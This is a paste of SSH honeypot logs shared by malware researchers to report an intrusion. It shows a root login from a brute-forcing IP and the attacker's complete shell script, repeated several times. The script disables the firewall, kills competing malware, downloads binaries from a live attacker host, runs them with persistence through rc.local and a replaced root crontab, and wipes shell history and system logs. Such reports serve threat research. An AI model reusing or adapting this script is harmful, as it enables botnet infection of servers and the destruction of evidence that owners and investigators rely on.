SHOW:
|
|
- or go back to the newest paste.
1 | #MalwareMustDie | Case: http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html | |
2 | #Follow report: still in the wild | |
3 | warning: live URLs | |
4 | ||
5 | #Reported log; | |
6 | ||
7 | 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] login attempt [root/password] succeeded | |
8 | 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] root authenticated with keyboard-interactive | |
9 | 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] starting service ssh-connection | |
10 | 2014-10-13 10:33:31-0400 [SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] got channel session request | |
11 | 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] channel open | |
12 | 2014-10-13 10:33:31-0400 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 61.174.50.134:40011 (x.x.x.x) [session: 551] | |
13 | 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] executing command "/etc/init.d/iptables stop | |
14 | echo "nameserver 8.8.8.8" >> /etc/resolv.conf | |
15 | echo "nameserver 8.8.4.4" >> /etc/resolv.conf | |
16 | apt-get -y install wget | |
17 | yum -y install wget | |
18 | chmod 7777 / etc | |
19 | killall -9 .IptabLes | |
20 | killall -9 nfsd4 | |
21 | killall -9 profild.key | |
22 | cd /etc;rm -rf dir fake.cfg | |
23 | killall -9 nfsd | |
24 | killall -9 DDosl | |
25 | killall -9 lengchao32 | |
26 | killall -9 b26 | |
27 | killall -9 khelper | |
28 | killall -9 Bill | |
29 | killall -9 n26 | |
30 | killall -9 007 | |
31 | killall -9 codelove | |
32 | killall -9 32 | |
33 | killall -9 m32 | |
34 | killall -9 m64 | |
35 | killall -9 64 | |
36 | killall -9 83BOT | |
37 | killall -9 82BOT | |
38 | killall -9 dos64 | |
39 | killall -9 dos32 | |
40 | killall -9 new6 | |
41 | killall -9 new4 | |
42 | killall -9 node24 | |
43 | killall -9 mimi | |
44 | killall -9 nodeJR-1 | |
45 | killall -9 freeBSD | |
46 | killall -9 ksapdd | |
47 | killall -9 106 | |
48 | killall -9 09 | |
49 | killall -9 xsw | |
50 | killall -9 syslogd | |
51 | killall -9 skysapdd | |
52 | killall -9 cupsddd | |
53 | killall -9 ksapd | |
54 | killall -9 atddd | |
55 | killall -9 xfsdxd | |
56 | killall -9 sfewfesfs | |
57 | killall -9 gfhjrtfyhuf | |
58 | killall -9 rewgtf3er4t | |
59 | killall -9 fdsfsfvff | |
60 | killall -9 smarvtd | |
61 | killall -9 whitptabil | |
62 | killall -9 gdmorpen | |
63 | cd /etc;chattr -i 66 | |
64 | cd /root; chmod 7777 / etc | |
65 | killall -9 minerd | |
66 | killall -9 syn | |
67 | killall -9 joudckfr | |
68 | killall -9 www | |
69 | killall -9 log | |
70 | killall -9 .IptabLes | |
71 | killall -9 .IptabLex | |
72 | killall -9 .Mm2 | |
73 | killall -9 acpid | |
74 | killall -9 m64 | |
75 | killall -9 ./QQ | |
76 | killall -9 aabb | |
77 | killall -9 g3 | |
78 | killall -9 S99local | |
79 | killall -9 3 | |
80 | killall -9 pm | |
81 | killall -9 qweasd | |
82 | killall -9 tangtang | |
83 | killall -9 imap-login | |
84 | killall -9 xudp | |
85 | killall -9 sshpa | |
86 | killall -9 008 | |
87 | killall -9 txma | |
88 | killall -9 mrdos64.b00 | |
89 | killall -9 mrdos32.b00 | |
90 | killall -9 kkpklp | |
91 | killall -9 kiilp | |
92 | killall -9 xin1 | |
93 | killall -9 jibateng | |
94 | killall -9 syscore.sh | |
95 | killall -9 syscore.sh | |
96 | killall -9 syscore.sh | |
97 | killall -9 .mimeo | |
98 | killall -9 .mimeo | |
99 | killall -9 .mimeo | |
100 | killall -9 .mimeop | |
101 | killall -9 .task1 | |
102 | killall -9 .mimeop | |
103 | killall -9 .IptabLes | |
104 | killall -9 .IptabLex | |
105 | killall -9 .IptabLes | |
106 | killall -9 .IptabLex | |
107 | killall -9 .IptabLes | |
108 | killall -9 .IptabLex | |
109 | killall -9 .IptabLes | |
110 | killall -9 .IptabLex | |
111 | cd /root;rm -rf dir nohup.out | |
112 | cd /etc;rm -rf dir fake.cfg | |
113 | cd /etc;rm -rf dir cupsddd.* | |
114 | cd /etc;rm -rf dir atddd.* | |
115 | cd /etc;rm -rf dir ksapdd.* | |
116 | cd /etc;rm -rf dir kysapdd.* | |
117 | cd /etc;rm -rf dir sksapdd.* | |
118 | cd /etc;rm -rf dir skysapdd.* | |
119 | cd /etc;rm -rf dir xfsdxd.* | |
120 | cd /etc;rm -rf dir fake.cfg | |
121 | cd /etc;rm -rf dir cupsdd.* | |
122 | cd /etc;rm -rf dir atdd.* | |
123 | cd /etc;rm -rf dir ksapd.* | |
124 | cd /etc;rm -rf dir kysapd.* | |
125 | cd /etc;rm -rf dir sksapd.* | |
126 | cd /etc;rm -rf dir skysapd.* | |
127 | cd /etc;rm -rf dir xfsdx.* | |
128 | cd /etc;rm -rf dir sfewfesfs | |
129 | cd /etc;rm -rf dir gfhjrtfyhuf | |
130 | cd /etc;rm -rf dir rewgtf3er4t | |
131 | cd /etc;rm -rf dir fdsfsfvff | |
132 | cd /etc;rm -rf dir smarvtd | |
133 | cd /etc;rm -rf dir whitptabil | |
134 | cd /etc;rm -rf dir gdmorpen | |
135 | cd /etc;rm -rf dir sfewfesfs.* | |
136 | cd /etc;rm -rf dir gfhjrtfyhuf.* | |
137 | cd /etc;rm -rf dir rewgtf3er4t.* | |
138 | cd /etc;rm -rf dir fdsfsfvff.* | |
139 | cd /etc;rm -rf dir smarvtd.* | |
140 | cd /etc;rm -rf dir whitptabil.* | |
141 | cd /etc;rm -rf dir gdmorpen.* | |
142 | cd /etc;rm -rf dir nhgbhhj.* | |
143 | cd /tmp;rm -rf dir 1.* | |
144 | cd /tmp;rm -rf dir 2.* | |
145 | cd /tmp;rm -rf dir 3.* | |
146 | cd /tmp;rm -rf dir 4.* | |
147 | cd /tmp;rm -rf dir 5.* | |
148 | cd /tmp;rm -rf dir jdhe | |
149 | cd /tmp;rm -rf dir jdhe.* | |
150 | cd /var/spool/cron; rm -rf dir root.* | |
151 | cd /var/spool/cron; rm -rf dir root | |
152 | cd /var/spool/cron/crontabs; rm -rf dir root.* | |
153 | cd /var/spool/cron/crontabs; rm -rf dir root | |
154 | cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root | |
155 | cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root | |
156 | yes|mv /tmp/root /var/spool/cron | |
157 | yes|mv /tmp/root /var/spool/cron/crontabs | |
158 | cd /tmp;wget -c http://www.frade8c.com:9162/jdhe | |
159 | cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs | |
160 | cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf | |
161 | cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t | |
162 | cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff | |
163 | cd /etc;wget -c http://www.frade8c.com:9162/smarvtd | |
164 | cd /etc;wget -c http://www.frade8c.com:9162/whitptabil | |
165 | cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen | |
166 | cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj | |
167 | cd /etc;wget -c http://www.frade8c.com:9162/byv832 | |
168 | cd /tmp;chmod 7777 jdhe | |
169 | cd /etc;chmod 7777 nhgbhhj | |
170 | cd /etc;chmod 7777 byv832 | |
171 | cd /etc;chmod 7777 sfewfesfs | |
172 | cd /etc;chmod 7777 gfhjrtfyhuf | |
173 | cd /etc;chmod 7777 rewgtf3er4t | |
174 | cd /etc;chmod 7777 fdsfsfvff | |
175 | cd /etc;chmod 7777 smarvtd | |
176 | cd /etc;chmod 7777 whitptabil | |
177 | cd /etc;chmod 7777 gdmorpen | |
178 | cd /tmp;chmod 7777 nhgbhhj | |
179 | cd /tmp;chmod 7777 byv832 | |
180 | cd /tmp;chmod 7777 sfewfesfs | |
181 | cd /tmp;chmod 7777 gfhjrtfyhuf | |
182 | cd /tmp;chmod 7777 rewgtf3er4t | |
183 | cd /tmp;chmod 7777 fdsfsfvff | |
184 | cd /tmp;chmod 7777 smarvtd | |
185 | cd /tmp;chmod 7777 whitptabil | |
186 | cd /tmp;chmod 7777 gdmorpen | |
187 | cd /tmp;./jdhe | |
188 | nohup /etc/sfewfesfs > /dev/null 2>&1& | |
189 | nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& | |
190 | nohup /etc/rewgtf3er4t > /dev/null 2>&1& | |
191 | nohup /etc/fdsfsfvff > /dev/null 2>&1& | |
192 | nohup /etc/smarvtd > /dev/null 2>&1& | |
193 | nohup /etc/whitptabil > /dev/null 2>&1& | |
194 | nohup /etc/gdmorpen > /dev/null 2>&1& | |
195 | nohup /etc/nhgbhhj > /dev/null 2>&1& | |
196 | nohup /etc/byv832 > /dev/null 2>&1& | |
197 | nohup /tmp/sfewfesfs > /dev/null 2>&1& | |
198 | nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& | |
199 | nohup /tmp/rewgtf3er4t > /dev/null 2>&1& | |
200 | nohup /tmp/fdsfsfvff > /dev/null 2>&1& | |
201 | nohup /tmp/smarvtd > /dev/null 2>&1& | |
202 | nohup /tmp/whitptabil > /dev/null 2>&1& | |
203 | nohup /tmp/gdmorpen > /dev/null 2>&1& | |
204 | nohup /tmp/nhgbhhj > /dev/null 2>&1& | |
205 | nohup /tmp/byv832 > /dev/null 2>&1& | |
206 | echo "cd /tmp;./sfewfesfs" >> /etc/rc.local | |
207 | echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local | |
208 | echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local | |
209 | echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local | |
210 | echo "cd /tmp;./smarvtd" >> /etc/rc.local | |
211 | echo "cd /tmp;./whitptabil" >> /etc/rc.local | |
212 | echo "cd /tmp;./gdmorpen" >> /etc/rc.local | |
213 | echo "cd /etc;./sfewfesfs" >> /etc/rc.local | |
214 | echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local | |
215 | echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local | |
216 | echo "cd /etc;./fdsfsfvff" >> /etc/rc.local | |
217 | echo "cd /etc;./smarvtd" >> /etc/rc.local | |
218 | echo "cd /etc;./whitptabil" >> /etc/rc.local | |
219 | echo "cd /etc;./gdmorpen" >> /etc/rc.local | |
220 | echo "unset MAILCHECK" >> /etc/profile | |
221 | cd /etc;chattr +i sfewfesfs | |
222 | rm -rf /root/.bash_history | |
223 | touch /root/.bash_history | |
224 | history -r | |
225 | cd /var/log > dmesg | |
226 | cd /var/log > auth.log | |
227 | cd /var/log > alternatives.log | |
228 | cd /var/log > boot.log | |
229 | cd /var/log > btmp | |
230 | cd /var/log > cron | |
231 | cd /var/log > cups | |
232 | cd /var/log > daemon.log | |
233 | cd /var/log > dpkg.log | |
234 | cd /var/log > faillog | |
235 | cd /var/log > kern.log | |
236 | cd /var/log > lastlog | |
237 | cd /var/log > maillog | |
238 | cd /var/log > user.log | |
239 | cd /var/log > Xorg.x.log | |
240 | cd /var/log > anaconda.log | |
241 | cd /var/log > yum.log | |
242 | cd /var/log > secure | |
243 | cd /var/log > wtmp | |
244 | cd /var/log > utmp | |
245 | cd /var/log > messages | |
246 | cd /var/log > spooler | |
247 | cd /var/log > sudolog | |
248 | cd /var/log > aculog | |
249 | cd /var/log > access-log | |
250 | cd /root > .bash_history | |
251 | history -c" | |
252 | 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] exec command: "/etc/init.d/iptables stop | |
253 | echo "nameserver 8.8.8.8" >> /etc/resolv.conf | |
254 | echo "nameserver 8.8.4.4" >> /etc/resolv.conf | |
255 | apt-get -y install wget | |
256 | yum -y install wget | |
257 | chmod 7777 / etc | |
258 | killall -9 .IptabLes | |
259 | killall -9 nfsd4 | |
260 | killall -9 profild.key | |
261 | cd /etc;rm -rf dir fake.cfg | |
262 | killall -9 nfsd | |
263 | killall -9 DDosl | |
264 | killall -9 lengchao32 | |
265 | killall -9 b26 | |
266 | killall -9 khelper | |
267 | killall -9 Bill | |
268 | killall -9 n26 | |
269 | killall -9 007 | |
270 | killall -9 codelove | |
271 | killall -9 32 | |
272 | killall -9 m32 | |
273 | killall -9 m64 | |
274 | killall -9 64 | |
275 | killall -9 83BOT | |
276 | killall -9 82BOT | |
277 | killall -9 dos64 | |
278 | killall -9 dos32 | |
279 | killall -9 new6 | |
280 | killall -9 new4 | |
281 | killall -9 node24 | |
282 | killall -9 mimi | |
283 | killall -9 nodeJR-1 | |
284 | killall -9 freeBSD | |
285 | killall -9 ksapdd | |
286 | killall -9 106 | |
287 | killall -9 09 | |
288 | killall -9 xsw | |
289 | killall -9 syslogd | |
290 | killall -9 skysapdd | |
291 | killall -9 cupsddd | |
292 | killall -9 ksapd | |
293 | killall -9 atddd | |
294 | killall -9 xfsdxd | |
295 | killall -9 sfewfesfs | |
296 | killall -9 gfhjrtfyhuf | |
297 | killall -9 rewgtf3er4t | |
298 | killall -9 fdsfsfvff | |
299 | killall -9 smarvtd | |
300 | killall -9 whitptabil | |
301 | killall -9 gdmorpen | |
302 | cd /etc;chattr -i 66 | |
303 | cd /root; chmod 7777 / etc | |
304 | killall -9 minerd | |
305 | killall -9 syn | |
306 | killall -9 joudckfr | |
307 | killall -9 www | |
308 | killall -9 log | |
309 | killall -9 .IptabLes | |
310 | killall -9 .IptabLex | |
311 | killall -9 .Mm2 | |
312 | killall -9 acpid | |
313 | killall -9 m64 | |
314 | killall -9 ./QQ | |
315 | killall -9 aabb | |
316 | killall -9 g3 | |
317 | killall -9 S99local | |
318 | killall -9 3 | |
319 | killall -9 pm | |
320 | killall -9 qweasd | |
321 | killall -9 tangtang | |
322 | killall -9 imap-login | |
323 | killall -9 xudp | |
324 | killall -9 sshpa | |
325 | killall -9 008 | |
326 | killall -9 txma | |
327 | killall -9 mrdos64.b00 | |
328 | killall -9 mrdos32.b00 | |
329 | killall -9 kkpklp | |
330 | killall -9 kiilp | |
331 | killall -9 xin1 | |
332 | killall -9 jibateng | |
333 | killall -9 syscore.sh | |
334 | killall -9 syscore.sh | |
335 | killall -9 syscore.sh | |
336 | killall -9 .mimeo | |
337 | killall -9 .mimeo | |
338 | killall -9 .mimeo | |
339 | killall -9 .mimeop | |
340 | killall -9 .task1 | |
341 | killall -9 .mimeop | |
342 | killall -9 .IptabLes | |
343 | killall -9 .IptabLex | |
344 | killall -9 .IptabLes | |
345 | killall -9 .IptabLex | |
346 | killall -9 .IptabLes | |
347 | killall -9 .IptabLex | |
348 | killall -9 .IptabLes | |
349 | killall -9 .IptabLex | |
350 | cd /root;rm -rf dir nohup.out | |
351 | cd /etc;rm -rf dir fake.cfg | |
352 | cd /etc;rm -rf dir cupsddd.* | |
353 | cd /etc;rm -rf dir atddd.* | |
354 | cd /etc;rm -rf dir ksapdd.* | |
355 | cd /etc;rm -rf dir kysapdd.* | |
356 | cd /etc;rm -rf dir sksapdd.* | |
357 | cd /etc;rm -rf dir skysapdd.* | |
358 | cd /etc;rm -rf dir xfsdxd.* | |
359 | cd /etc;rm -rf dir fake.cfg | |
360 | cd /etc;rm -rf dir cupsdd.* | |
361 | cd /etc;rm -rf dir atdd.* | |
362 | cd /etc;rm -rf dir ksapd.* | |
363 | cd /etc;rm -rf dir kysapd.* | |
364 | cd /etc;rm -rf dir sksapd.* | |
365 | cd /etc;rm -rf dir skysapd.* | |
366 | cd /etc;rm -rf dir xfsdx.* | |
367 | cd /etc;rm -rf dir sfewfesfs | |
368 | cd /etc;rm -rf dir gfhjrtfyhuf | |
369 | cd /etc;rm -rf dir rewgtf3er4t | |
370 | cd /etc;rm -rf dir fdsfsfvff | |
371 | cd /etc;rm -rf dir smarvtd | |
372 | cd /etc;rm -rf dir whitptabil | |
373 | cd /etc;rm -rf dir gdmorpen | |
374 | cd /etc;rm -rf dir sfewfesfs.* | |
375 | cd /etc;rm -rf dir gfhjrtfyhuf.* | |
376 | cd /etc;rm -rf dir rewgtf3er4t.* | |
377 | cd /etc;rm -rf dir fdsfsfvff.* | |
378 | cd /etc;rm -rf dir smarvtd.* | |
379 | cd /etc;rm -rf dir whitptabil.* | |
380 | cd /etc;rm -rf dir gdmorpen.* | |
381 | cd /etc;rm -rf dir nhgbhhj.* | |
382 | cd /tmp;rm -rf dir 1.* | |
383 | cd /tmp;rm -rf dir 2.* | |
384 | cd /tmp;rm -rf dir 3.* | |
385 | cd /tmp;rm -rf dir 4.* | |
386 | cd /tmp;rm -rf dir 5.* | |
387 | cd /tmp;rm -rf dir jdhe | |
388 | cd /tmp;rm -rf dir jdhe.* | |
389 | cd /var/spool/cron; rm -rf dir root.* | |
390 | cd /var/spool/cron; rm -rf dir root | |
391 | cd /var/spool/cron/crontabs; rm -rf dir root.* | |
392 | cd /var/spool/cron/crontabs; rm -rf dir root | |
393 | cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root | |
394 | cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root | |
395 | yes|mv /tmp/root /var/spool/cron | |
396 | yes|mv /tmp/root /var/spool/cron/crontabs | |
397 | cd /tmp;wget -c http://www.frade8c.com:9162/jdhe | |
398 | cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs | |
399 | cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf | |
400 | cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t | |
401 | cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff | |
402 | cd /etc;wget -c http://www.frade8c.com:9162/smarvtd | |
403 | cd /etc;wget -c http://www.frade8c.com:9162/whitptabil | |
404 | cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen | |
405 | cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj | |
406 | cd /etc;wget -c http://www.frade8c.com:9162/byv832 | |
407 | cd /tmp;chmod 7777 jdhe | |
408 | cd /etc;chmod 7777 nhgbhhj | |
409 | cd /etc;chmod 7777 byv832 | |
410 | cd /etc;chmod 7777 sfewfesfs | |
411 | cd /etc;chmod 7777 gfhjrtfyhuf | |
412 | cd /etc;chmod 7777 rewgtf3er4t | |
413 | cd /etc;chmod 7777 fdsfsfvff | |
414 | cd /etc;chmod 7777 smarvtd | |
415 | cd /etc;chmod 7777 whitptabil | |
416 | cd /etc;chmod 7777 gdmorpen | |
417 | cd /tmp;chmod 7777 nhgbhhj | |
418 | cd /tmp;chmod 7777 byv832 | |
419 | cd /tmp;chmod 7777 sfewfesfs | |
420 | cd /tmp;chmod 7777 gfhjrtfyhuf | |
421 | cd /tmp;chmod 7777 rewgtf3er4t | |
422 | cd /tmp;chmod 7777 fdsfsfvff | |
423 | cd /tmp;chmod 7777 smarvtd | |
424 | cd /tmp;chmod 7777 whitptabil | |
425 | cd /tmp;chmod 7777 gdmorpen | |
426 | cd /tmp;./jdhe | |
427 | nohup /etc/sfewfesfs > /dev/null 2>&1& | |
428 | nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& | |
429 | nohup /etc/rewgtf3er4t > /dev/null 2>&1& | |
430 | nohup /etc/fdsfsfvff > /dev/null 2>&1& | |
431 | nohup /etc/smarvtd > /dev/null 2>&1& | |
432 | nohup /etc/whitptabil > /dev/null 2>&1& | |
433 | nohup /etc/gdmorpen > /dev/null 2>&1& | |
434 | nohup /etc/nhgbhhj > /dev/null 2>&1& | |
435 | nohup /etc/byv832 > /dev/null 2>&1& | |
436 | nohup /tmp/sfewfesfs > /dev/null 2>&1& | |
437 | nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& | |
438 | nohup /tmp/rewgtf3er4t > /dev/null 2>&1& | |
439 | nohup /tmp/fdsfsfvff > /dev/null 2>&1& | |
440 | nohup /tmp/smarvtd > /dev/null 2>&1& | |
441 | nohup /tmp/whitptabil > /dev/null 2>&1& | |
442 | nohup /tmp/gdmorpen > /dev/null 2>&1& | |
443 | nohup /tmp/nhgbhhj > /dev/null 2>&1& | |
444 | nohup /tmp/byv832 > /dev/null 2>&1& | |
445 | echo "cd /tmp;./sfewfesfs" >> /etc/rc.local | |
446 | echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local | |
447 | echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local | |
448 | echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local | |
449 | echo "cd /tmp;./smarvtd" >> /etc/rc.local | |
450 | echo "cd /tmp;./whitptabil" >> /etc/rc.local | |
451 | echo "cd /tmp;./gdmorpen" >> /etc/rc.local | |
452 | echo "cd /etc;./sfewfesfs" >> /etc/rc.local | |
453 | echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local | |
454 | echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local | |
455 | echo "cd /etc;./fdsfsfvff" >> /etc/rc.local | |
456 | echo "cd /etc;./smarvtd" >> /etc/rc.local | |
457 | echo "cd /etc;./whitptabil" >> /etc/rc.local | |
458 | echo "cd /etc;./gdmorpen" >> /etc/rc.local | |
459 | echo "unset MAILCHECK" >> /etc/profile | |
460 | cd /etc;chattr +i sfewfesfs | |
461 | rm -rf /root/.bash_history | |
462 | touch /root/.bash_history | |
463 | history -r | |
464 | cd /var/log > dmesg | |
465 | cd /var/log > auth.log | |
466 | cd /var/log > alternatives.log | |
467 | cd /var/log > boot.log | |
468 | cd /var/log > btmp | |
469 | cd /var/log > cron | |
470 | cd /var/log > cups | |
471 | cd /var/log > daemon.log | |
472 | cd /var/log > dpkg.log | |
473 | cd /var/log > faillog | |
474 | cd /var/log > kern.log | |
475 | cd /var/log > lastlog | |
476 | cd /var/log > maillog | |
477 | cd /var/log > user.log | |
478 | cd /var/log > Xorg.x.log | |
479 | cd /var/log > anaconda.log | |
480 | cd /var/log > yum.log | |
481 | cd /var/log > secure | |
482 | cd /var/log > wtmp | |
483 | cd /var/log > utmp | |
484 | cd /var/log > messages | |
485 | cd /var/log > spooler | |
486 | cd /var/log > sudolog | |
487 | cd /var/log > aculog | |
488 | cd /var/log > access-log | |
489 | cd /root > .bash_history | |
490 | history -c" | |
491 | 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Opening TTY log: log/tty/20141013-103331-7357.log | |
492 | 2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Running exec command "/etc/init.d/iptables stop | |
493 | echo "nameserver 8.8.8.8" >> /etc/resolv.conf | |
494 | echo "nameserver 8.8.4.4" >> /etc/resolv.conf | |
495 | apt-get -y install wget | |
496 | yum -y install wget | |
497 | chmod 7777 / etc | |
498 | killall -9 .IptabLes | |
499 | killall -9 nfsd4 | |
500 | killall -9 profild.key | |
501 | cd /etc;rm -rf dir fake.cfg | |
502 | killall -9 nfsd | |
503 | killall -9 DDosl | |
504 | killall -9 lengchao32 | |
505 | killall -9 b26 | |
506 | killall -9 khelper | |
507 | killall -9 Bill | |
508 | killall -9 n26 | |
509 | killall -9 007 | |
510 | killall -9 codelove | |
511 | killall -9 32 | |
512 | killall -9 m32 | |
513 | killall -9 m64 | |
514 | killall -9 64 | |
515 | killall -9 83BOT | |
516 | killall -9 82BOT | |
517 | killall -9 dos64 | |
518 | killall -9 dos32 | |
519 | killall -9 new6 | |
520 | killall -9 new4 | |
521 | killall -9 node24 | |
522 | killall -9 mimi | |
523 | killall -9 nodeJR-1 | |
524 | killall -9 freeBSD | |
525 | killall -9 ksapdd | |
526 | killall -9 106 | |
527 | killall -9 09 | |
528 | killall -9 xsw | |
529 | killall -9 syslogd | |
530 | killall -9 skysapdd | |
531 | killall -9 cupsddd | |
532 | killall -9 ksapd | |
533 | killall -9 atddd | |
534 | killall -9 xfsdxd | |
535 | killall -9 sfewfesfs | |
536 | killall -9 gfhjrtfyhuf | |
537 | killall -9 rewgtf3er4t | |
538 | killall -9 fdsfsfvff | |
539 | killall -9 smarvtd | |
540 | killall -9 whitptabil | |
541 | killall -9 gdmorpen | |
542 | cd /etc;chattr -i 66 | |
543 | cd /root; chmod 7777 / etc | |
544 | killall -9 minerd | |
545 | killall -9 syn | |
546 | killall -9 joudckfr | |
547 | killall -9 www | |
548 | killall -9 log | |
549 | killall -9 .IptabLes | |
550 | killall -9 .IptabLex | |
551 | killall -9 .Mm2 | |
552 | killall -9 acpid | |
553 | killall -9 m64 | |
554 | killall -9 ./QQ | |
555 | killall -9 aabb | |
556 | killall -9 g3 | |
557 | killall -9 S99local | |
558 | killall -9 3 | |
559 | killall -9 pm | |
560 | killall -9 qweasd | |
561 | killall -9 tangtang | |
562 | killall -9 imap-login | |
563 | killall -9 xudp | |
564 | killall -9 sshpa | |
565 | killall -9 008 | |
566 | killall -9 txma | |
567 | killall -9 mrdos64.b00 | |
568 | killall -9 mrdos32.b00 | |
569 | killall -9 kkpklp | |
570 | killall -9 kiilp | |
571 | killall -9 xin1 | |
572 | killall -9 jibateng | |
573 | killall -9 syscore.sh | |
574 | killall -9 syscore.sh | |
575 | killall -9 syscore.sh | |
576 | killall -9 .mimeo | |
577 | killall -9 .mimeo | |
578 | killall -9 .mimeo | |
579 | killall -9 .mimeop | |
580 | killall -9 .task1 | |
581 | killall -9 .mimeop | |
582 | killall -9 .IptabLes | |
583 | killall -9 .IptabLex | |
584 | killall -9 .IptabLes | |
585 | killall -9 .IptabLex | |
586 | killall -9 .IptabLes | |
587 | killall -9 .IptabLex | |
588 | killall -9 .IptabLes | |
589 | killall -9 .IptabLex | |
590 | cd /root;rm -rf dir nohup.out | |
591 | cd /etc;rm -rf dir fake.cfg | |
592 | cd /etc;rm -rf dir cupsddd.* | |
593 | cd /etc;rm -rf dir atddd.* | |
594 | cd /etc;rm -rf dir ksapdd.* | |
595 | cd /etc;rm -rf dir kysapdd.* | |
596 | cd /etc;rm -rf dir sksapdd.* | |
597 | cd /etc;rm -rf dir skysapdd.* | |
598 | cd /etc;rm -rf dir xfsdxd.* | |
599 | cd /etc;rm -rf dir fake.cfg | |
600 | cd /etc;rm -rf dir cupsdd.* | |
601 | cd /etc;rm -rf dir atdd.* | |
602 | cd /etc;rm -rf dir ksapd.* | |
603 | cd /etc;rm -rf dir kysapd.* | |
604 | cd /etc;rm -rf dir sksapd.* | |
605 | cd /etc;rm -rf dir skysapd.* | |
606 | cd /etc;rm -rf dir xfsdx.* | |
607 | cd /etc;rm -rf dir sfewfesfs | |
608 | cd /etc;rm -rf dir gfhjrtfyhuf | |
609 | cd /etc;rm -rf dir rewgtf3er4t | |
610 | cd /etc;rm -rf dir fdsfsfvff | |
611 | cd /etc;rm -rf dir smarvtd | |
612 | cd /etc;rm -rf dir whitptabil | |
613 | cd /etc;rm -rf dir gdmorpen | |
614 | cd /etc;rm -rf dir sfewfesfs.* | |
615 | cd /etc;rm -rf dir gfhjrtfyhuf.* | |
616 | cd /etc;rm -rf dir rewgtf3er4t.* | |
617 | cd /etc;rm -rf dir fdsfsfvff.* | |
618 | cd /etc;rm -rf dir smarvtd.* | |
619 | cd /etc;rm -rf dir whitptabil.* | |
620 | cd /etc;rm -rf dir gdmorpen.* | |
621 | cd /etc;rm -rf dir nhgbhhj.* | |
622 | cd /tmp;rm -rf dir 1.* | |
623 | cd /tmp;rm -rf dir 2.* | |
624 | cd /tmp;rm -rf dir 3.* | |
625 | cd /tmp;rm -rf dir 4.* | |
626 | cd /tmp;rm -rf dir 5.* | |
627 | cd /tmp;rm -rf dir jdhe | |
628 | cd /tmp;rm -rf dir jdhe.* | |
629 | cd /var/spool/cron; rm -rf dir root.* | |
630 | cd /var/spool/cron; rm -rf dir root | |
631 | cd /var/spool/cron/crontabs; rm -rf dir root.* | |
632 | cd /var/spool/cron/crontabs; rm -rf dir root | |
633 | cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root | |
634 | cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root | |
635 | yes|mv /tmp/root /var/spool/cron | |
636 | yes|mv /tmp/root /var/spool/cron/crontabs | |
637 | cd /tmp;wget -c http://www.frade8c.com:9162/jdhe | |
638 | cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs | |
639 | cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf | |
640 | cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t | |
641 | cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff | |
642 | cd /etc;wget -c http://www.frade8c.com:9162/smarvtd | |
643 | cd /etc;wget -c http://www.frade8c.com:9162/whitptabil | |
644 | cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen | |
645 | cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj | |
646 | cd /etc;wget -c http://www.frade8c.com:9162/byv832 | |
647 | cd /tmp;chmod 7777 jdhe | |
648 | cd /etc;chmod 7777 nhgbhhj | |
649 | cd /etc;chmod 7777 byv832 | |
650 | cd /etc;chmod 7777 sfewfesfs | |
651 | cd /etc;chmod 7777 gfhjrtfyhuf | |
652 | cd /etc;chmod 7777 rewgtf3er4t | |
653 | cd /etc;chmod 7777 fdsfsfvff | |
654 | cd /etc;chmod 7777 smarvtd | |
655 | cd /etc;chmod 7777 whitptabil | |
656 | cd /etc;chmod 7777 gdmorpen | |
657 | cd /tmp;chmod 7777 nhgbhhj | |
658 | cd /tmp;chmod 7777 byv832 | |
